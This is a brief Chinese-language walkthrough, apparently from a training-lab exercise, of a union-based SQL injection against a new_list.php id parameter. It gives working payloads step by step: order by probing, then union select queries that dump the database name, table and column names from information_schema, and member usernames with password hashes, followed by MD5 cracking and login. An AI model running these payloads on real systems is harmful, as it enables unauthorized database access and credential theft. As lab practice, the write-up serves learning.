使用order by 测试有没有SQL注入
发现order by 5显示异常
new_list.php?id=-1 union select 1,2,3,4--+new_list.php?id=-1 union select 1,2,3,4--+有回显
union select1,database(),3,4--+查出数据库名
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'--+查出数据库里的表
union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member'--+查出表里的内容
union select 1,group_concat(name,password),3,4 from StormGroup_member--+查出用户名和密码
再用md5解密
然后就可以登进去了